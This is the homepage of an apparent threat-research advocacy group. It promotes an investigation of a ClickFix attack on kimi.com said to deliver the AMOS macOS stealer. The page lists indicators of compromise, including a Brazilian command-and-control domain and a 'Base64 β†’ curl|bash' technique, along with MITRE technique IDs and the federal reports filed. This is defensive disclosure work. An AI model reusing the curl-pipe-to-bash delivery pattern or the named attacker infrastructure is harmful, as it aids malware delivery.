Active Threat Monitoring

Exposing Cyber Threats.
Protecting Digital Futures.

CogNoodle Advocacy investigates, documents, and exposes real-world cybersecurity threats β€” from malware campaigns to AI-powered social engineering β€” so the world can fight back.

View Investigations Report a Threat
AMOS Stealer β€” Active Campaign ClickFix Social Engineering β€” Spreading kimi.com Compromised Delivery Vector CogNoodle Investigation #001 Published contatoplus.com C2 Infrastructure β€” Brazil Multinational Attack Chain: CN β†’ BR β†’ RU Federal Reports Filed (FBI, CISA, FTC) AMOS Stealer β€” Active Campaign ClickFix Social Engineering β€” Spreading kimi.com Compromised Delivery Vector CogNoodle Investigation #001 Published contatoplus.com C2 Infrastructure β€” Brazil Multinational Attack Chain: CN β†’ BR β†’ RU Federal Reports Filed (FBI, CISA, FTC)
Our Mission
Three Pillars of Digital Defense

We believe cybersecurity awareness shouldn't be locked behind paywalls or corporate firewalls. CogNoodle Advocacy makes threat intelligence accessible to everyone.

πŸ”

Investigate & Expose

Real-time investigation of active malware campaigns, social engineering attacks, and threat actor infrastructure. We document everything so the community can learn.

πŸ›‘οΈ

Educate & Protect

Translating complex threat intelligence into actionable guidance. From IOC databases to plain-language advisories, we help individuals and organizations defend themselves.

πŸ“’

Report & Advocate

Filing reports with federal agencies (FBI, CISA, FTC), coordinating with platform vendors, and advocating for policy changes that make the internet safer for everyone.

Featured Investigation
Investigation #001: ClickFix on kimi.com

A multinational malware delivery operation leveraging a Chinese AI platform to distribute Russian-origin macOS infostealer malware through Brazilian command-and-control infrastructure.

πŸ”΄ Active Threat β€” Feb 2026

ClickFix + AMOS Stealer:
The kimi.com Attack Chain

On February 26, 2026, CogNoodle researchers encountered a ClickFix social engineering attack on kimi.com (Moonshot AI) that attempted to deliver AMOS (Atomic macOS Stealer) via fake system dialogs triggering curl|bash payloads. The download attempt was unsuccessful based on available evidence.

Read Full Investigation Report β†’
🌐
Delivery Vector kimi.com (China)
πŸ–₯️
C2 Server contatoplus.com (Brazil)
πŸ’€
Payload AMOS Stealer (Russia)
πŸ—ΊοΈ
Infrastructure Contabo GmbH, AS174
πŸ“‹
MITRE ATT&CK T1204 T1059 T1027 T1555
⚠️ Indicators of Compromise (IOCs)
TypeIndicatorContext
Domaincontatoplus.comC2 server β€” Brazilian hosting
IP191.101.236.xContabo GmbH VPS (ASN 174)
Domainkimi.comDelivery vector β€” injected ClickFix
TechniqueBase64 β†’ curl|bashEncoded C2 URL in clipboard payload
MalwareAMOS (Atomic macOS Stealer)Russian-origin MaaS via Telegram
Federal Reporting
Active Reports Filed

CogNoodle has filed formal reports with federal cybersecurity and law enforcement agencies regarding the ClickFix/AMOS threat campaign.

πŸ›οΈ FBI Internet Crime Complaint Center

Formal cybercrime complaint filed with the FBI IC3 detailing the multinational attack chain and threat actor infrastructure.

ic3.gov β†’

πŸ›‘οΈ CISA (Cybersecurity & Infrastructure Security Agency)

Vulnerability disclosure and threat intelligence report submitted to CISA for national cybersecurity awareness coordination.

cisa.gov β†’

βš–οΈ Federal Trade Commission (FTC)

Consumer protection report filed documenting deceptive tactics used in the ClickFix social engineering campaign.

reportfraud.ftc.gov β†’

πŸ”’ Google Safe Browsing

Malicious URL and phishing site report submitted to Google's Safe Browsing team for browser-level threat protection.

safebrowsing.google.com β†’

Spotted a threat? Report it.

If you've encountered suspicious activity, malware, or social engineering attacks, contact us. We investigate, document, and file reports with the appropriate authorities.

Contact CogNoodle Security